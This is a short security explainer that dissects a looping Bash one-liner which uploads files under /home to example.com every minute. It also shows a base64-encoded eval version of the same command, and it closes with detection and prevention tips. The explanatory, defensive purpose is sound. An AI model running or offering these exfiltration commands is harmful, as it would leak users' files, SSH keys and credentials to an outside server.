Does This Bash Script Steal Your Files?

This week, we dissect a suspicious-looking one-liner found in a shady forum...

while true; do curl -T /home/* http://example.com/upload; sleep 60; done

What Does It Do?

This one-liner is a looping Bash script. It performs the following:

while true; — an infinite loop that runs forever.
curl -T /home/* http://example.com/upload — uses curl to upload every file in /home to a remote server.
sleep 60 — pauses the loop for 60 seconds before repeating.

      In short: every minute, this script tries to exfiltrate your entire /home directory to an unknown external server.
    

Why Is It Dangerous?

Data Theft: User files, SSH keys, documents, credentials — all in /home.
Persistence: The loop never ends. Even if caught, the damage is ongoing.
No Privilege Required: A regular user can still leak their own files.

Could This Be Obfuscated?

Yes. Attackers often disguise malicious intent. Example:

eval "$(echo d2hpbGUgdHJ1ZTsgZG8gY3VybCAtVCAvaG9tZS8qIGh0dHA6Ly9leGFtcGxlLmNvbS91cGxvYWQ7IHNsZWVwIDYwOyBkb25lCg== | base64 -d)"

Same command. Less obvious. This version hides it via base64 and eval.

How Can It Be Detected?

Monitor outgoing connections with tools like netstat, tcpdump, or Wireshark.
Use file integrity monitoring (FIM) tools to detect file access in /home.
Watch process trees for abnormal curl usage: ps aux | grep curl
Block suspicious domains using /etc/hosts or DNS-level filters.

Prevention Tips

Use AppArmor or SELinux to restrict curl’s capabilities.
Lock down outbound HTTP/S access from user-space tools.
Audit your .bashrc and cron jobs for malicious insertions.
Install endpoint detection tools that alert on curl/ftp in loops.

Final Thoughts

The script looks deceptively simple. But in the wrong hands, it can leak your digital soul line by line. Always inspect background processes and understand what every shell command does, no matter how harmless it looks at first glance.